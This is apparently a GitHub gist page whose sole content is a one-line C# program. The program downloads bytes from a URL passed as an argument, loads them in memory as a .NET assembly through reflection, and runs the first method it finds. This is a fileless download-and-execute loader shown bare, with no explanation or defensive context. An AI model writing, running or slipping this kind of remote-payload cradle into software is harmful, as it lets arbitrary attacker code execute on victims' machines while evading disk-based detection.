Created
          June 20, 2018 22:37 
        
      - 
      
- 
        Save cobbr/1d4eb62c17e02c29977d952b3106cb4c to your computer and use it in GitHub Desktop. 
Revisions
- 
        cobbr created this gist Jun 20, 2018 .There are no files selected for viewingThis file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1 @@ public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }